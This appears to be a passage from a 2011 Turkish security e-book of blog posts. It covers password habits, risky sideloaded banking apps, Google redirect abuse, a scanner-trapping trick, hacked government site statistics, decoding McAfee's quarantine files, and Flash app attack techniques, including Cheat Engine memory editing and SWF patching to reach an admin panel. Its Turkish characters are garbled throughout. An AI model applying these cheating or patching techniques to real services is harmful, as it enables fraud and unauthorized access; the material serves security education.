En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 28: Hack 4 Career - 2011

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini 